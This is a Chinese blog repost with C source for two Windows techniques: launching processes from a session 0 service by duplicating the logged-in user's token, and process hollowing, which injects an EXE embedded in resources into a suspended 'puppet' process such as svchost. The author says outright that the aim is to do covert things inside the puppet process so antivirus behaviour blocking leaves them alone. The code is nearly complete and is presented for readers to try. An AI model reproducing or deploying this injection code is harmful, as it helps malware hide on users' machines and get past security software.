• 突破session 0隔离 和 劫持exe注入(转自梦无极)

    代码基本源于网络,作用看个人需求。

    session 0隔离是个老话题,这里简单讲讲,小伙伴们赶快看过来吧。

    自vista系统开始,进程便有了session空间的概念,一般系统服务进程是在session 0的会话空间里面执行,其他应用程序都是在session 1或者session x会话空间中运行。一般情况下,进程A属于session x会话空间,那么它所创建的进程同样是属于session x会话空间。
    当你写的是个系统服务的时候,由于系统服务进程处于session 0空间,所以该进程如果想创建出一个进程,那么创建出来的进程也就是属于session 0会话空间了。而session 0会话空间中能做的事情有限,比如无法显示一个操作界面,很难和用户交互。所以你必须在session 0会话空间中创建出属于非session 0会话空间的进程。
    下面的代码展示了如何去做。

    3. BOOL CreateProcessS (
    4.         __in_opt    LPCWSTR lpApplicationName,
    5.         __inout_opt LPWSTR lpCommandLine,
    6.         __in_opt    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    7.         __in_opt    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    8.         __in        BOOL bInheritHandles,
    9.         __in        DWORD dwCreationFlags,
    10.         __in_opt    LPCWSTR lpCurrentDirectory,
    11.         __in        LPSTARTUPINFOW lpStartupInfo,
    12.         __out       LPPROCESS_INFORMATION lpProcessInformation
    13.         )
    14. {
    15.         BOOL  isSuccess = FALSE;
    16.         DWORD dwCurrentSessionId = 0;
    17.         ProcessIdToSessionId(GetCurrentProcessId(),&dwCurrentSessionId);
    19.         if (dwCurrentSessionId == 0)
    20.         {
    21.                 HANDLE        hToken = NULL;
    22.                 DWORD        dwSessionID = 0;
    23.                 LPVOID        lpEnvironment = NULL;
    24.                 HANDLE        hDuplicatedToken = NULL;
    26.                 //服务进程会话id为零,以下代码用于绕过session 0隔离
    29.                 dwSessionID = WTSGetActiveConsoleSessionId();
    31.                 // 获得当前Session的用户令牌
    32.                 if (WTSQueryUserToken(dwSessionID,&hToken) == FALSE)
    33.                 {
    34.                         goto Cleanup;
    35.                 }
    37.                 // 复制令牌
    38.                 if (DuplicateTokenEx(hToken,MAXIMUM_ALLOWED,NULL,SecurityIdentification, TokenPrimary,&hDuplicatedToken) == FALSE)
    39.                 {
    40.                         goto Cleanup;
    41.                 }
    43.                 // 创建用户Session环境
    44.                 if (CreateEnvironmentBlock(&lpEnvironment,hDuplicatedToken,FALSE) == FALSE)
    45.                 {
    46.                         goto Cleanup;
    47.                 }
    49.                 // 在复制的用户Session下执行应用程序,创建进程。
    50.                 if ((isSuccess = CreateProcessAsUser(hDuplicatedToken,lpApplicationName,lpCommandLine,lpProcessAttributes,lpThreadAttributes,bInheritHandles,
    51.                         dwCreationFlags,lpEnvironment,lpCurrentDirectory,lpStartupInfo,lpProcessInformation) )== FALSE)
    52.                 {
    53.                         goto Cleanup;
    54.                 }
    56.                 // 清理工作
    57. Cleanup:
    58.                 if (hToken != NULL)
    59.                 {
    60.                         CloseHandle(hToken);
    61.                 }
    63.                 if (hDuplicatedToken != NULL)
    64.                 {
    65.                         CloseHandle(hDuplicatedToken);
    66.                 }
    68.                 if (lpEnvironment != NULL)
    69.                 {
    70.                         DestroyEnvironmentBlock(lpEnvironment);
    71.                 }
    72.         }
    73.         else
    74.         {
    75.                 isSuccess = CreateProcess(lpApplicationName,lpCommandLine,lpProcessAttributes,lpThreadAttributes,bInheritHandles,dwCreationFlags,NULL,lpCurrentDirectory,lpStartupInfo,lpProcessInformation);
    76.         }
    78.         return isSuccess;
    79. }
    复制代码



    简单吧,代码主要来自网络。

    有了创建的代码还不行,因为有时候我们服务进程需要做一点儿猥琐的事情,比如创建一个傀儡进程,比如选择一个svchost作为傀儡进程,然后执行我们偷偷想要做的事情。创建傀儡进程的好处是杀毒基本不会管你傀儡进程中做什么事情,那就不用考虑行为拦截问题了。

    2. void CreatePuppetProcess(HMODULE hModule,WCHAR *pszPuppetImagePath)
    3. {
    4.         int                                i;
    5.         HRSRC                        hrSrc;
    6.         HGLOBAL                        hg;
    7.         DWORD                        dwSize;
    8. #ifdef _WIN64
    9.         WOW64_CONTEXT                ThreadContext = {0};
    10. #else
    11.         CONTEXT                        ThreadContext = {0};
    12. #endif // _WIN64
    13.         DWORD                        dwPuppetProcessImageBase = 0;
    14.         PVOID                        lpNewProcessImageBase = NULL;
    15.         SIZE_T                        NumberOfBytes = 0;
    17.         PIMAGE_DOS_HEADER                lpImageDosHeader = NULL;
    18.         PIMAGE_NT_HEADERS32                lpImageNtHeaders = NULL;
    19.         PIMAGE_SECTION_HEADER        lpImageSectionHeader = NULL;
    20.         STARTUPINFO                                StartupInfo = {0};
    21.         PROCESS_INFORMATION                ProcessInfo = {0};
    23.         ZWUNMAPVIEWOFSECTION        pfnZwUnmapViewOfSection = NULL;
    25.         StartupInfo.cb = sizeof(STARTUPINFO);
    27.         hrSrc =  FindResourceA(hModule, MAKEINTRESOURCEA(IDR_DLL1),"DLL"); 
    28.         hg = LoadResource(hModule, hrSrc);
    29.         dwSize = SizeofResource( hModule,hrSrc);
    31.         if (dwSize == 0){        return;        }
    33.         pfnZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(LoadLibraryA("ntdll.dll"),"ZwUnmapViewOfSection");
    34.         if (pfnZwUnmapViewOfSection == NULL){        return;        }
    36.         lpImageDosHeader = (PIMAGE_DOS_HEADER)hg;
    37.         lpImageNtHeaders = (PIMAGE_NT_HEADERS32)((ULONG_PTR)hg + lpImageDosHeader->e_lfanew);
    38.         lpImageSectionHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)hg + lpImageDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
    40.         if (CreateProcessS(pszPuppetImagePath/*L"C:\Windows\System32\calc.exe"*/,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,&StartupInfo,&ProcessInfo) == FALSE)
    41.         {
    42.                 goto __exit;
    43.         }
    45.         ThreadContext.ContextFlags = CONTEXT_FULL;
    46. #ifdef _WIN64
    47.         if (Wow64GetThreadContext(ProcessInfo.hThread,&ThreadContext) == FALSE)
    48.         {
    49.                 goto __exit;
    50.         }
    51. #else
    52.         if (GetThreadContext(ProcessInfo.hThread,&ThreadContext) == FALSE)
    53.         {
    54.                 goto __exit;
    55.         }
    56. #endif // _WIN64
    59.         if (ReadProcessMemory(ProcessInfo.hProcess,(LPCVOID)(ThreadContext.Ebx + 0x8),&dwPuppetProcessImageBase,sizeof(DWORD),&NumberOfBytes) == FALSE)
    60.         {
    61.                 goto __exit;
    62.         }
    64.         if (dwPuppetProcessImageBase == lpImageNtHeaders->OptionalHeader.ImageBase)
    65.         {
    66.                 pfnZwUnmapViewOfSection(ProcessInfo.hProcess,(PVOID)dwPuppetProcessImageBase);
    67.         }
    69.         lpNewProcessImageBase = VirtualAllocEx(ProcessInfo.hProcess,
    70.                 (LPVOID)(ULONG_PTR)lpImageNtHeaders->OptionalHeader.ImageBase,(SIZE_T)lpImageNtHeaders->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    71.         if (lpNewProcessImageBase == NULL)
    72.         {
    73.                 int error = GetLastError();
    74.                 goto __exit;
    75.         }
    77.         if (WriteProcessMemory(ProcessInfo.hProcess,lpNewProcessImageBase,lpImageDosHeader,(SIZE_T)lpImageNtHeaders->OptionalHeader.SizeOfHeaders,&NumberOfBytes) == FALSE)
    78.         {
    79.                 goto __exit;
    80.         }
    82.         for (i = 0;i < lpImageNtHeaders->FileHeader.NumberOfSections;i++)
    83.         {
    84.                 WriteProcessMemory(ProcessInfo.hProcess,(LPVOID)((ULONG_PTR)lpNewProcessImageBase + lpImageSectionHeader[i].VirtualAddress),
    85.                         (LPCVOID)((ULONG_PTR)hg + lpImageSectionHeader[i].PointerToRawData),(SIZE_T)lpImageSectionHeader[i].SizeOfRawData,&NumberOfBytes);
    86.         }
    88. #ifdef _WIN64
    89.         WriteProcessMemory(ProcessInfo.hProcess,(LPVOID)(ThreadContext.Ebx + 0x8),&lpNewProcessImageBase,sizeof(PVOID),&NumberOfBytes);
    90.         ThreadContext.Eax = 0;
    91.         ThreadContext.Eax = (ULONG)lpNewProcessImageBase + lpImageNtHeaders->OptionalHeader.AddressOfEntryPoint;
    92.         Wow64SetThreadContext(ProcessInfo.hThread,&ThreadContext);
    93. #else
    94.         WriteProcessMemory(ProcessInfo.hProcess,(LPVOID)(ThreadContext.Ebx + 0x8),&lpNewProcessImageBase,sizeof(PVOID),&NumberOfBytes);
    95.         ThreadContext.Eax = (DWORD)lpNewProcessImageBase + lpImageNtHeaders->OptionalHeader.AddressOfEntryPoint;
    96.         SetThreadContext(ProcessInfo.hThread,&ThreadContext);
    97. #endif // _WIN64
    98.         ResumeThread(ProcessInfo.hThread);
    100. __exit:
    102.         if (ProcessInfo.hProcess != NULL)
    103.         {
    104.                 CloseHandle(ProcessInfo.hProcess);
    105.         }
    107.         if (ProcessInfo.hThread != NULL)
    108.         {
    109.                 CloseHandle(ProcessInfo.hThread);
    110.         }
    111. }
    复制代码



    首先这个代码是把一个exe程序放在了资源里面,函数第一个参数的模块句柄是当前模块的句柄,如果是dll,那么就是dll的模块句柄。如果你想测试此函数效果,那么你写的就是exe程序运行此函数,这时这里的模块句柄可以为NULL。至于怎么把文件添加到资源,这里我就不讲解方法了,网上很多资料。

    必须注意的是,你所要创建的傀儡进程必须是32位的,你放在资源中的exe也必须是32位的。而你调用CreatePuppetProcess函数所在的进程可以是32位或者64位。


    然后通过此代码你就可以实现创建一个傀儡进程了,如果是在session 0会话空间中创建傀儡进程,这里还会实现突破session 0隔离创建进程。


    小伙伴们赶紧自己去实验吧,更多内容请关注mengwuji.net后续动态。
  • 相关阅读:
    习惯的本质:逐步建立新的常态
    如何度过有用的每一天
    如何利用晚上八点到十点这段时间自我提升
    为什么很多年轻人总会感到迷茫
    当你学会专注,人生才算真正成熟
    如何过上简单的生活
    游标
    触发器

    函数
  • 原文地址:https://www.cnblogs.com/15157737693zsp/p/4691116.html
Copyright © 2020-2023  润新知